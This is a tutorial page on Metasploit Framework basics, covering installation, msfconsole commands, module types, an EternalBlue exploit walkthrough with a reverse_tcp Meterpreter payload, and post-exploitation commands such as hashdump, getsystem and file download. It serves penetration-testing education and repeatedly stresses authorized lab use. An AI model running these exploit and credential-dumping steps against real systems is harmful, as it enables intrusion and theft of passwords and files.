Metasploit Framework Basics

What Is Metasploit

The Metasploit Framework is the world's most widely used open-source penetration testing platform. Developed originally by H.D. Moore in 2003 and now maintained by Rapid7, it provides security professionals with a comprehensive toolkit for discovering vulnerabilities, developing exploits, and validating security defenses.

Metasploit contains thousands of tested exploits, hundreds of payloads, and a rich set of auxiliary modules for tasks like scanning, fuzzing, and credential harvesting. It is the de facto standard in professional penetration testing and is included by default in security-focused Linux distributions like Kali Linux and Parrot OS.

⚠️

Use Metasploit only in authorized lab environments or with explicit written permission.

Running exploits against systems you do not own or have authorization to test is illegal in virtually every jurisdiction. This includes the Computer Fraud and Abuse Act (US), the Computer Misuse Act (UK), and equivalent laws worldwide. Unauthorized use can result in criminal prosecution, civil liability, and permanent career damage. This tutorial is intended solely for learning in controlled lab environments.

Installation and Setup

Metasploit Framework (the open-source edition) can be installed on most Linux distributions, macOS, and Windows. The easiest path is to use Kali Linux, which ships with Metasploit pre-installed.

Installing on Kali Linux

Metasploit comes pre-installed on Kali Linux. If you need to update or reinstall it:

# Update Metasploit to the latest version
sudo apt update
sudo apt install metasploit-framework

# Initialize the database (required for tracking sessions and loot)
sudo msfdb init

# Verify the installation
msfconsole --version

Installing on Ubuntu/Debian

# Install dependencies
sudo apt update
sudo apt install -y curl gnupg2

# Install using the official installer script
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

# Initialize the database
sudo msfdb init

💡

Metasploit requires PostgreSQL.

The Metasploit database uses PostgreSQL to store host information, vulnerability data, captured credentials, and session logs. Running msfdb init automatically sets up PostgreSQL and creates the required database. Without it, Metasploit still works but you lose the ability to track and search through your findings efficiently.

Setting Up a Practice Lab

Never practice against real systems. Instead, use intentionally vulnerable virtual machines:

Metasploitable 2/3 -- Rapid7's own vulnerable VM, designed specifically for Metasploit practice
DVWA (Damn Vulnerable Web Application) -- a PHP/MySQL web application with deliberate vulnerabilities
VulnHub -- a repository of hundreds of intentionally vulnerable VMs for download
HackTheBox / TryHackMe -- online platforms with legal practice targets

MSF Console Basics

The primary interface for Metasploit is msfconsole, an interactive command-line shell. It provides tab completion, command history, and access to every module in the framework.

# Launch the Metasploit console
msfconsole

On first launch, you will see a banner with ASCII art and statistics about the available modules. The prompt changes to msf6 >, indicating you are inside the console.

Essential Console Commands

# Display help for all commands
msf6 > help

# Check database connectivity
msf6 > db_status

# Search for modules by keyword
msf6 > search type:exploit platform:windows smb

# Get info about a specific module
msf6 > info exploit/windows/smb/ms17_010_eternalblue

# Select a module to use
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# Show configurable options for the selected module
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# Go back to the main prompt
msf6 exploit(windows/smb/ms17_010_eternalblue) > back

💡

Tab completion is your best friend.

Press Tab at any point to auto-complete module paths, command names, and option values. For example, typing use exploit/win and pressing Tab will show all Windows exploit modules. This is far faster than memorizing thousands of module paths.

Module Types

Metasploit organizes its functionality into distinct module types. Understanding each type is fundamental to using the framework effectively.

Exploits

Exploit modules take advantage of a specific vulnerability in a target system to deliver a payload. They are categorized by target platform and service.

# Example: list all SMB exploits
msf6 > search type:exploit smb

# Example: list exploits for a specific CVE
msf6 > search cve:2017-0144

Payloads

Payloads are the code that runs on the target system after a successful exploit. Metasploit offers three categories of payloads:

Singles -- self-contained payloads that perform a single action (e.g., add a user, execute a command)
Stagers -- small payloads that establish a communication channel between attacker and target, then download the larger stage
Stages -- larger payloads downloaded by stagers, providing advanced functionality like Meterpreter

# List all available payloads for the current exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads

# Set a specific payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

Auxiliary Modules

Auxiliary modules perform tasks that do not involve exploitation directly. These include port scanners, service enumerators, fuzzers, brute-force tools, and denial-of-service testers.

# Example: scan for SMB versions on a network
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(scanner/smb/smb_version) > run

Post-Exploitation Modules

Post modules run after you have gained access to a target. They extract information, escalate privileges, pivot through the network, or establish persistence.

# Example: dump password hashes from a compromised Windows system
msf6 > use post/windows/gather/hashdump
msf6 post(windows/gather/hashdump) > set SESSION 1
msf6 post(windows/gather/hashdump) > run

Searching, Configuring, and Running Exploits

The typical Metasploit workflow follows a consistent pattern: search for a module, select it, configure the required options, and run it. Here is a complete walkthrough.

Step 1: Search for Modules

The search command accepts keywords, CVE numbers, platforms, and module types:

# Search by keyword
msf6 > search eternalblue

# Search with filters
msf6 > search type:exploit platform:linux name:apache

# Search by CVE identifier
msf6 > search cve:2021-44228

Step 2: Select and Configure

# Select the module
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# View all options and their current values
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# Set the target host (RHOSTS = Remote Hosts)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.50

# Set the local host for the reverse connection (LHOST = Local Host)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.100

# Set the payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

Step 3: Validate and Run

# Check if the target is likely vulnerable (not all exploits support this)
msf6 exploit(windows/smb/ms17_010_eternalblue) > check

# Run the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

⚠️

Always use the "check" command first when available.

The check command tests whether the target is vulnerable without actually running the exploit. Not all modules support it, but when available, it lets you verify the vulnerability before causing any changes to the target system. This is especially important in professional engagements where stability matters.

Meterpreter Basics

Meterpreter (Meta-Interpreter) is Metasploit's most powerful payload. It is an advanced, dynamically extensible payload that runs entirely in memory on the target system, making it difficult to detect with traditional antivirus software. It communicates over an encrypted channel and provides a rich command set for post-exploitation.

Essential Meterpreter Commands

# System information
meterpreter > sysinfo

# Get current user identity
meterpreter > getuid

# List running processes
meterpreter > ps

# Get the current working directory
meterpreter > pwd

# Navigate the file system
meterpreter > cd C:\\Users
meterpreter > ls

# Download a file from the target
meterpreter > download C:\\Users\\target\\Documents\\secret.txt

# Upload a file to the target
meterpreter > upload /home/attacker/tool.exe C:\\temp\\tool.exe

# Take a screenshot of the target's desktop
meterpreter > screenshot

# Attempt to escalate to SYSTEM privileges
meterpreter > getsystem

# Dump password hashes
meterpreter > hashdump

# Drop into a system command shell
meterpreter > shell

# Background the current session (return to msf prompt)
meterpreter > background

# Terminate the session cleanly
meterpreter > exit

💡

Meterpreter runs in memory.

Unlike traditional payloads that write files to disk, Meterpreter operates entirely in the target's RAM. This means it leaves minimal forensic evidence and is harder to detect. However, it also means that the session is lost if the target process crashes or the system reboots. Use the migrate command to move to a more stable process.

Session Management

When running multiple engagements, Metasploit tracks each active connection as a session:

# List all active sessions
msf6 > sessions

# Interact with a specific session
msf6 > sessions -i 1

# Kill a specific session
msf6 > sessions -k 1

# Kill all sessions
msf6 > sessions -K

Database and Workspaces

The Metasploit database stores all information gathered during a penetration test -- discovered hosts, open ports, identified services, captured credentials, and session logs. Workspaces allow you to separate data from different engagements.

# Check database status
msf6 > db_status

# Create a new workspace for a specific engagement
msf6 > workspace -a client-pentest-2026

# Switch between workspaces
msf6 > workspace client-pentest-2026

# List all workspaces
msf6 > workspace

# Import Nmap scan results into the database
msf6 > db_import /path/to/nmap-scan.xml

# View discovered hosts
msf6 > hosts

# View discovered services
msf6 > services

# View captured credentials
msf6 > creds

🎉

Pro tip: integrate Nmap with Metasploit.

You can run Nmap scans directly from inside Metasploit using the db_nmap command. Results are automatically stored in the database: db_nmap -sV -O 192.168.1.0/24. This saves time compared to running Nmap separately and then importing the XML file.

Responsible Use

Metasploit is a double-edged sword. The same capabilities that make it invaluable for security professionals can cause serious harm if misused. Responsible use is not optional -- it is the foundation of ethical hacking.

Written authorization -- never run Metasploit against any system without explicit, written permission from the system owner that defines the scope of testing
Scope boundaries -- stay within the agreed-upon scope; do not pivot to systems outside the engagement boundaries, even if you discover a path to them
Document everything -- log all commands, sessions, and findings; this protects both you and the client
Minimize impact -- prefer non-destructive techniques; avoid denial-of-service exploits unless specifically authorized
Secure your tools -- protect your Metasploit installation and its data; compromised pentest data is a serious breach
Report findings -- vulnerabilities you discover must be reported to the system owner with clear remediation guidance
Clean up -- remove any shells, backdoors, accounts, or artifacts created during testing

⚠️

The "I was just testing" defense does not hold up in court.

Running exploits against systems without authorization is a criminal offense regardless of your intent. Many well-meaning security researchers have faced prosecution for testing systems they believed were in scope but were not covered by their authorization. When in doubt, stop and verify your scope.

Summary

In this tutorial, you learned the fundamentals of the Metasploit Framework:

What Metasploit is -- the world's leading open-source penetration testing platform
Installation -- setting up Metasploit and its PostgreSQL database on Kali or Ubuntu
MSF Console -- navigating the interactive console with search, use, show, and set commands
Module types -- exploits, payloads (singles/stagers/stages), auxiliary modules, and post-exploitation modules
Exploit workflow -- searching, configuring RHOSTS/LHOST/PAYLOAD, checking, and running exploits
Meterpreter -- an in-memory payload with commands for navigation, file transfer, privilege escalation, and session management
Database and workspaces -- organizing engagement data and integrating with Nmap
Responsible use -- always requiring written authorization, staying in scope, and documenting findings

🎉

Solid foundation established!

You now understand the core concepts of the Metasploit Framework. To build real skill, set up a lab with Metasploitable or similar intentionally vulnerable VMs and practice the full workflow: scan, identify, exploit, post-exploit, and report. Never practice on systems you do not own.